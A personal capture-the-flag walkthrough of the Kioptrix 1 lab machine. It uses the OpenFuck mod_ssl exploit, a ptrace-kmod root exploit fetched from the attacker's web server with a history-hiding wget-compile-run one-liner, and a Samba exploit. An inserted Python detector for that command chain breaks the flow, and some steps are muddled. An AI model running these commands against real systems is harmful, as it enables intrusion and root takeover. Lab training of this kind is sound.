Kioptrix 1 (K1)

Emmanuel
Dec 26, 2021

This machine is named Kioptrix 1. I downloaded my box from the CTM by Heath.

Reference link (Original): https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

I ran the command ‘netdiscover’ on Kali Linux to find the specific IP of Kioptrix (K1).

I started enumeration with tools like nmap, nikto, and dirbuster.

Enumeration is the key. I found the important stuff on this machine:

Server: Apache/1.3.20 (Unix)

OS: Red Hat Linux (mod_ssl/2.8.4 OpenSSL/0.9.6b).

I googled for an exploit for ‘Red Hat Linux (mod_ssl/2.8.4 OpenSSL/0.9.6b)’.

#Manual Exploitation

There’s a repository on GitHub where a C program named ‘OpenFuck.c’ can be downloaded, along with well-detailed instructions on how to configure the C program for exploitation. See the images below.

I followed the instructions and it worked well.

With the command ‘./(NameOfTheFileYouMade)’ you are basically saying: run this program.

There are two options you may choose here.

0x6a

0x6b

Either of them should work. Then include the IP, port, ‘-c’ and a range within ‘40-50’.

Command: ./NameOfTheFileYouMade 0x(includeEither) IP Port -c 40-50

Once it completes there will be a shell, ‘bash-2.05$’. This shell is not as interactive as we expected, and it belongs to a low-privilege user; for this box we need to be root. I tried the ptrace-kmod command. Unfortunately, it did not work since there is no internet access on the machine.

I opened a new tab with a downloaded C exploit for higher privilege.

Link: http://packetstormsecurity.nl/0304-exploits/ptrace-kmod.c

I set up a local web server with the downloaded file. Basically, when you set up your web server, the file needs to be in the same directory. This keeps things efficient and accurate. This should be in another tab.

Command: python3 -m http.server 80

I typed this command in the bash shell I mentioned earlier.

Command: unset HISTFILE; cd /tmp; wget http://192.168.124.128/ptrace-kmod.c; gcc -o mahirap ptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./mahirap; \n

#With HISTFILE unset, the shell does not save its command history to a file.
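Seen from the defender's side, the command line above is a recognisable chain: history disabled, C source fetched, compiled in /tmp, source deleted, new binary run. The sketch below is an added example, not part of the original walkthrough; the record format, the service account names and the sample records are assumptions constructed for illustration.

```python
import re

# Stage patterns for the download-compile-run chain in the command above.
STAGES = [
    ("history_disabled", re.compile(r"^unset\s+HISTFILE\b")),
    ("source_download", re.compile(r"^(wget|curl)\s.*\.c$")),
    ("compile", re.compile(r"^(gcc|cc)\s.*-o\s+(?P<out>\S+)")),
    ("source_removed", re.compile(r"^rm\s.*\.c$")),
]
TEMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")  # world-writable locations

def stages_in(command_line, cwd="/"):
    """Return the ordered stages found in one ';'-separated shell command line."""
    found, built = [], set()
    for part in (p.strip() for p in command_line.split(";")):
        if part.startswith("cd "):  # simplification: treats every cd as absolute
            cwd = part[3:].strip()
        for name, rx in STAGES:
            m = rx.search(part)
            if m:
                found.append(name)
                if name == "compile" and cwd.startswith(TEMP_DIRS):
                    built.add(m.group("out"))
        words = part[2:].split() if part.startswith("./") else []
        if words and words[0] in built:
            found.append("ran_new_binary_in_tmp")
    return found

def alerts(records, service_accounts=("apache", "nobody", "www-data")):
    """Flag records where a service account compiles and runs code in a temp dir."""
    out = []
    for user, cwd, cmd in records:
        found = stages_in(cmd, cwd)
        if user in service_accounts and "ran_new_binary_in_tmp" in found:
            out.append((user, found))
    return out

# Constructed sample records: (account, working directory, command line).
SAMPLE = [
    ("apache", "/", "unset HISTFILE; cd /tmp; wget http://192.168.124.128/ptrace-kmod.c; "
                    "gcc -o mahirap ptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./mahirap"),
    ("dev", "/home/dev/src", "gcc -o hello hello.c; ./hello"),
    ("apache", "/var/www", "ls -la"),
]

if __name__ == "__main__":
    for user, found in alerts(SAMPLE):
        print(user, "->", ", ".join(found))
```

Only the first sample record is flagged; a developer compiling in a home directory and a service account running an ordinary command are not.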

Command: /etc/passwd

You are now root and you can now view details on this system.

#Automation (Using Metasploit Framework):

This method is much easier than the first one.

root@kali: msfconsole

set rhosts IP

rhosts = IP of the device that will be compromised / need to have more details or enumeration.

I found out this has Unix Samba 2.2.1a (as we did earlier in the enumeration part).

Search with searchsploit for exploits, scanners, etc.

Command: searchsploit -m multiple/remote/10.c

Once we have the C program (exploit), we need to manually configure it using gcc.

Command: gcc -o samba 10.c

Command: ./samba -b0 IPoftheTargetMachine

I did not include the flag or anything here. My goal here is to get root access and become familiar with the ins and outs.